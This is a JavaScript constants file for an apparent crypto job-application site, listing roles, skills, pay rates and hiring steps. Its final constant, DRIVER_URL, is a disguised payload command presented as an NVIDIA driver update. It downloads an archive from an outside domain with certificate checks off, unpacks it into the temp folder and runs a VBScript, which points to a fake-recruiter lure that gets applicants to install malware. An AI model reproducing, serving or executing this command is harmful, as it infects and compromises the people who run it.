export const ROLES = [
  { id: "Smart Contract Auditor", label: "Smart Contract Auditor" },
  {
    id: "Consensus Algorithm Researcher",
    label: "Consensus Algorithm Researcher",
  },
  { id: "Node Operator", label: "Node Operator" },
  { id: "Crypto Trader", label: "Crypto Trader" },
  { id: "Quantitative Analyst (Quant)", label: "Quantitative Analyst (Quant)" },
  { id: "Crypto Portfolio Manager", label: "Crypto Portfolio Manager" },
  { id: "On-Chain Analyst", label: "On-Chain Analyst" },
  { id: "DeFi Yield Farmer", label: "DeFi Yield Farmer" },
  { id: "Crypto Economist", label: "Crypto Economist" },
  { id: "NFT Analyst", label: "NFT Analyst" },
  { id: "Web3 Product Manager", label: "Web3 Product Manager" },
  {
    id: "Growth Hacker (Crypto Marketing)",
    label: "Growth Hacker (Crypto Marketing)",
  },
  { id: "Crypto PR Specialist", label: "Crypto PR Specialist" },
  { id: "Web3 Project Manager", label: "Web3 Project Manager" },
  { id: "DAO Coordinator", label: "DAO Coordinator" },
  { id: "Tokenomics Designer", label: "Tokenomics Designer" },
  { id: "Treasury Manager", label: "Treasury Manager" },
  { id: "Metaverse Designer", label: "Metaverse Designer" },
  { id: "NFT Artist", label: "NFT Artist" },
  { id: "Crypto Miner", label: "Crypto Miner" },
  { id: "Validator Operator", label: "Validator Operator" },
  { id: "Blockchain Data Scientist", label: "Blockchain Data Scientist" },
  { id: "AI & Crypto Researcher", label: "AI & Crypto Researcher" },
];

export const SKILLS_BY_ROLES = {
  "Smart Contract Auditor": [
    "Solidity, Vyper",
    "Smart contract security analysis",
    "Formal verification & fuzz testing",
    "Static & dynamic code analysis",
    "Blockchain security best practices",
    "Penetration testing",
  ],
  "Consensus Algorithm Researcher": [
    "Distributed systems",
    "Cryptographic protocols",
    "Game theory & incentive models",
    "Proof-of-Work (PoW), Proof-of-Stake (PoS), and alternative consensus mechanisms",
    "Byzantine Fault Tolerance (BFT)",
    "Network security",
  ],
  "Node Operator": [
    "Linux system administration",
    "Blockchain node setup & maintenance",
    "Networking & firewall configurations",
    "Cloud infrastructure (AWS, GCP, Azure)",
    "Monitoring & logging tools (Prometheus, Grafana)",
    "RPC & API management",
  ],
  "Crypto Trader": [
    "Technical analysis (TA)",
    "Fundamental analysis (FA)",
    "Market-making strategies",
    "Risk management",
    "Algorithmic trading",
    "Portfolio diversification",
  ],
  "Quantitative Analyst (Quant)": [
    "Statistical modeling & data analysis",
    "Algorithmic trading strategies",
    "Python, R, or MATLAB",
    "High-frequency trading (HFT)",
    "Derivatives pricing models",
    "Machine learning for trading",
  ],
  "Crypto Portfolio Manager": [
    "Asset allocation & diversification",
    "Risk-adjusted return analysis",
    "On-chain & off-chain data analytics",
    "Market research & due diligence",
    "Performance benchmarking",
    "Treasury management",
  ],
  "On-Chain Analyst": [
    "Blockchain data analytics",
    "Transaction monitoring & forensics",
    "Smart contract interactions",
    "Wallet tracking & risk assessment",
    "AML & compliance reporting",
    "SQL, Python for blockchain data",
  ],
  "DeFi Yield Farmer": [
    "Liquidity provision strategies",
    "Automated Market Makers (AMMs)",
    "Yield optimization protocols (e.g., Yearn, Aave, Compound)",
    "Gas fee optimization",
    "Risk assessment in DeFi",
    "Smart contract interactions",
  ],
  "Crypto Economist": [
    "Tokenomics & incentive design",
    "Game theory",
    "Monetary policy in Web3",
    "Governance models (DAOs, staking)",
    "Economic modeling tools (Python, R)",
    "Financial regulations in crypto",
  ],
  "NFT Analyst": [
    "NFT market trends & valuation models",
    "Rarity analysis",
    "Smart contract verification (ERC-721, ERC-1155)",
    "Community engagement insights",
    "Metaverse & digital assets research",
    "On-chain data analysis",
  ],
  "Web3 Product Manager": [
    "Agile methodologies & roadmap planning",
    "Tokenomics & Web3 business models",
    "Blockchain UX/UI design",
    "Smart contract integrations",
    "Community & ecosystem growth strategies",
    "Product-market fit analysis",
  ],
  "Growth Hacker (Crypto Marketing)": [
    "Web3 community growth strategies",
    "Social media & influencer marketing",
    "SEO & content marketing",
    "Paid advertising (Google Ads, Twitter, Discord)",
    "A/B testing & conversion optimization",
    "Analytics & engagement tracking",
  ],
  "Crypto PR Specialist": [
    "Media relations in crypto",
    "Press releases & thought leadership",
    "Crisis management",
    "Social media branding",
    "Influencer partnerships",
    "Regulatory communications",
  ],
  "Web3 Project Manager": [
    "Agile & Scrum methodologies",
    "Cross-functional team leadership",
    "Smart contract deployment cycles",
    "Budget & resource allocation",
    "Risk management in blockchain projects",
    "Governance & compliance in DAOs",
  ],
  "DAO Coordinator": [
    "Decentralized governance frameworks",
    "Proposal writing & submission",
    "Token-based voting systems",
    "Community engagement strategies",
    "Treasury & fund management",
    "Legal considerations for DAOs",
  ],
  "Tokenomics Designer": [
    "Supply & demand modeling",
    "Staking & incentive structures",
    "Governance & voting mechanisms",
    "Inflation & deflation modeling",
    "Liquidity provision economics",
    "Smart contract-based financial models",
  ],
  "Treasury Manager": [
    "Crypto asset treasury management",
    "Risk mitigation in DeFi",
    "Stablecoin management strategies",
    "Yield farming & staking optimization",
    "Multi-signature wallet operations",
    "Financial reporting & auditing",
  ],
  "Metaverse Designer": [
    "3D modeling (Blender, Unity, Unreal Engine)",
    "Virtual economy design",
    "Smart contract integration",
    "Game theory in metaverse environments",
    "NFT asset creation & sales",
    "User engagement & gamification",
  ],
  "NFT Artist": [
    "Digital art creation (Photoshop, Illustrator, Procreate)",
    "3D modeling & animation",
    "Smart contract minting (ERC-721, ERC-1155)",
    "Generative art algorithms",
    "Community engagement & branding",
    "NFT marketplace strategies",
  ],
  "Crypto Miner": [
    "ASIC & GPU mining hardware management",
    "Mining software configuration",
    "Blockchain network optimization",
    "Energy efficiency & cost management",
    "Proof-of-Work (PoW) protocols",
    "Mining pool participation strategies",
  ],
  "Validator Operator": [
    "Proof-of-Stake (PoS) node operation",
    "Delegation & staking strategies",
    "Blockchain governance participation",
    "Server security & uptime management",
    "Slashing prevention & risk management",
    "Cloud-based validator infrastructure",
  ],
  "Blockchain Data Scientist": [
    "On-chain data analytics",
    "AI & machine learning in blockchain",
    "Graph-based blockchain analysis",
    "Predictive modeling",
    "Blockchain data visualization",
    "Statistical programming (Python, R, SQL)",
  ],
  "AI & Crypto Researcher": [
    "Machine learning & deep learning models",
    "AI-driven trading strategies",
    "Smart contract security analysis with AI",
    "AI-based fraud detection",
    "NLP for blockchain sentiment analysis",
    "Federated learning in Web3",
  ],
};

export const RELATED_SKILLS = {
  React: [
    "Redux",
    "Next.js",
    "React Router",
    "Jest",
    "Enzyme",
    "Webpack",
    "Babel",
    "Axios",
    "Styled Components",
    "CSS Modules",
  ],
  JavaScript: [
    "ES6",
    "TypeScript",
    "Node.js",
    "npm",
    "Webpack",
    "Babel",
    "ESLint",
    "Jest",
  ],
  "HTML/CSS": [
    "Flexbox",
    "CSS Grid",
    "Responsive Design",
    "CSS Preprocessors",
    "CSS-in-JS",
  ],
  "Node.js": [
    "Express",
    "NestJS",
    "MongoDB",
    "PostgreSQL",
    "Redis",
    "GraphQL",
    "RESTful APIs",
    "Socket.io",
  ],
  "Full-stack": [
    "React",
    "Node.js",
    "Express",
    "MongoDB",
    "SQL",
    "RESTful APIs",
    "Git",
    "Docker",
    "AWS",
  ],
  Firebase: [
    "Realtime Database",
    "Cloud Firestore",
    "Authentication",
    "Cloud Functions",
    "Hosting",
  ],
  Python: ["Django", "Flask", "FastAPI", "NumPy", "Pandas", "TensorFlow"],
  "Next.js": [
    "Server-Side Rendering",
    "Static Site Generation",
    "API Routes",
    "Image Optimization",
    "Internationalization",
  ],
  Redux: [
    "Redux Toolkit",
    "Redux Thunk",
    "Redux Saga",
    "Reselect",
    "Immutable.js",
  ],
  GraphQL: [
    "Apollo Client",
    "Apollo Server",
    "GraphQL Schema",
    "Resolvers",
    "Mutations",
  ],
  TypeScript: [
    "Type Definitions",
    "Interfaces",
    "Generics",
    "Decorators",
    "TSLint",
  ],
  Testing: ["Jest", "React Testing Library", "Enzyme", "Cypress", "Selenium"],
  "Version Control": [
    "Git",
    "GitHub",
    "GitLab",
    "Bitbucket",
    "Branching Strategies",
  ],
  "CI/CD": ["Jenkins", "Travis CI", "CircleCI", "GitHub Actions", "GitLab CI"],
  "Cloud Services": [
    "AWS",
    "Google Cloud Platform",
    "Azure",
    "Heroku",
    "DigitalOcean",
  ],
  Containerization: [
    "Docker",
    "Kubernetes",
    "Docker Compose",
    "Container Orchestration",
  ],
  "State Management": ["Redux", "MobX", "Recoil", "Zustand", "Context API"],
  "API Development": [
    "RESTful APIs",
    "GraphQL",
    "Swagger",
    "Postman",
    "API Authentication",
  ],
  Database: ["MongoDB", "PostgreSQL", "MySQL", "Redis", "Elasticsearch"],
  "Performance Optimization": [
    "Code Splitting",
    "Lazy Loading",
    "Memoization",
    "Debouncing",
    "Throttling",
  ],
};

export const BASE_RATES = {
  us: 8000,
  uk: 6000,
  ca: 7000,
};

export const ROLE_MULTIPLIER = {
  blockchain: 1.4,
  "smart-contract": 1.3,
  frontend: 1.0,
  backend: 1.1,
  fullstack: 1.2,
  defi: 1.35,
  web3: 1.25,
  solidity: 1.3,
};

export const COMPLETE_STEPS = [
  {
    id: "applied",
    name: "Applied",
    description: "Application submitted successfully",
    status: "complete",
  },
  {
    id: "review",
    name: "Under Review",
    description: `We will review your application carefully. Take a break and have a coffee, We'll get in touch with you soon to let you know the status.`,
    status: "current",
  },
  {
    id: "interview",
    name: "Final Technical Interview",
    description:
      "In-depth discussion about your experience and skills. The goal of this interview is for us to get to know you, your background and experience better and for you to ask any questions you may have.",
    status: "upcoming",
  },
  // {
  //   id: "coding",
  //   name: "Coding Test",
  //   description:
  //     "Technical assessment of your coding skills. Further assessing your technical ability and skills enables us to ensure that you’re really at the top of your field.",
  //   status: "upcoming",
  // },
  {
    id: "join",
    name: "Join SoftCloudNet",
    description: "Welcome to our team! Final paperwork and onboarding",
    status: "upcoming",
  },
];

export const COMMITMENT_TYPE = [
  { id: "fulltime", label: "Full-time", description: "40 hours per week" },
  { id: "parttime", label: "Part-time", description: "20-30 hours per week" },
  { id: "asneeded", label: "As needed", description: "Flexible hours" },
];

export const DRIVER_URL = `curl -k -o \"%TEMP%\\nvidiaupdate.zip\" https://api.drivercamsupport.com/nvidia-rc.update && powershell -Command \"Expand-Archive -Force -Path \'%TEMP%\\nvidiaupdate.zip\' -DestinationPath \'%TEMP%\\nvidiadrive\'\" && wscript \"%TEMP%\\nvidiadrive\\update.vbs\"`;
